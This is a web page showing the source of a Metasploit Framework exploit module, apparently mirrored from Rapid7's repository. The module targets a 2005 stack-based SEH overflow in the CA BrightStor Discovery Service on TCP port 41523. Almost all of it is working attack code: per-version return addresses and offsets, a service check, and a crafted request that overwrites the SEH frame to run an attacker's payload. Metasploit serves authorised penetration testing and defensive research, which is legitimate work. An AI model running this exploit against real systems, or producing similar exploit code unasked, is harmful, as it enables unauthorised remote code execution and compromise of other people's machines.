Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/brightstor/discovery_tcp.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'CA BrightStor Discovery Service TCP Overflow',

17
        'Description' => %q{

18
          This module exploits a vulnerability in the CA BrightStor

19
          Discovery Service. This vulnerability occurs when a specific

20
          type of request is sent to the TCP listener on port 41523.

21
          This vulnerability was discovered by cybertronic[at]gmx.net

22
          and affects all known versions of the BrightStor product.

23
          This module is based on the 'cabrightstor_disco' exploit by

24
          HD Moore.

25
        },

26
        'Author' => [ 'hdm', 'aushack' ],

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          [ 'CVE', '2005-2535'],

30
          [ 'OSVDB', '13814'],

31
          [ 'BID', '12536'],

32
          [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'],

33
          [ 'EDB', '1131']

34
        ],

35
        'Privileged' => true,

36
        'Payload' => {

37
          'Space' => 2048,

38
          'BadChars' => "\x00",

39
          'StackAdjustment' => -3500,

40
        },

41
        'Platform' => %w{win},

42
        'Targets' => [

43
          [

44
            'cheyprod.dll 9/14/2000', # Build 1220.0 9/14/2000 7.0.1220.0

45
            {

46
              'Platform' => 'win',

47
              'Ret' => 0x23803b20, # pop/pop/ret

48
              'Offset' => 1032,

49
            },

50
          ],

51
          [

52
            'cheyprod.dll 12/12/2003',

53
            {

54
              'Platform' => 'win',

55
              'Ret' => 0x23805714, # pop/pop/ret

56
              'Offset' => 1024,

57
            },

58
          ],

59
          [

60
            'cheyprod.dll 07/21/2004',

61
            {

62
              'Platform' => 'win',

63
              'Ret' => 0x23805d10, # pop/pop/ret

64
              'Offset' => 1024,

65
            },

66
          ],

67
        ],

68
        'DisclosureDate' => '2005-02-14',

69
        'DefaultTarget' => 1,

70
        'Notes' => {

71
          'Reliability' => UNKNOWN_RELIABILITY,

72
          'Stability' => UNKNOWN_STABILITY,

73
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

74
        }

75
      )

76
    )

77


78
    register_options(

79
      [

80
        Opt::RPORT(41523)

81
      ]

82
    )

83
  end

84


85
  def check

86
    # The first request should have no reply

87
    csock = Rex::Socket::Tcp.create(

88
      'PeerHost' => datastore['RHOST'],

89
      'PeerPort' => datastore['RPORT'],

90
      'Context' =>

91
        {

92
          'Msf' => framework,

93
          'MsfExploit' => self,

94
        }

95
    )

96


97
    csock.put('META')

98
    x = csock.get_once(-1, 3)

99
    csock.close

100


101
    # The second request should be replied with the host name

102
    csock = Rex::Socket::Tcp.create(

103
      'PeerHost' => datastore['RHOST'],

104
      'PeerPort' => datastore['RPORT'],

105
      'Context' =>

106
        {

107
          'Msf' => framework,

108
          'MsfExploit' => self,

109
        }

110
    )

111


112
    csock.put('hMETA')

113
    y = csock.get_once(-1, 3)

114
    csock.close

115


116
    if (y and not x)

117
      return Exploit::CheckCode::Detected

118
    end

119


120
    return Exploit::CheckCode::Safe

121
  end

122


123
  def exploit

124
    connect

125


126
    print_status("Trying target #{target.name}...")

127


128
    buf = rand_text_english(4096)

129


130
    # Overwriting the return address works well, but the only register

131
    # pointing back to our code is 'esp'. The following stub overwrites

132
    # the SEH frame instead, making things a bit easier.

133


134
    seh = generate_seh_payload(target.ret)

135
    buf[target['Offset'], seh.length] = seh

136


137
    # Make sure the return address is invalid to trigger SEH

138
    buf[900, 100] = (rand(127) + 128).chr * 100

139


140
    # SERVICEPC is the client host name actually =P (thanks Juliano!)

141
    req = "\x9b" + 'SERVICEPC' + "\x18" + [0x01020304].pack('N') + 'SERVICEPC' + "\x01\x0c\x6c\x93\xce\x18\x18\x41"

142
    req << buf

143


144
    sock.put(req)

145
    sock.get_once

146


147
    handler

148
    disconnect

149
  end

150
end

151


152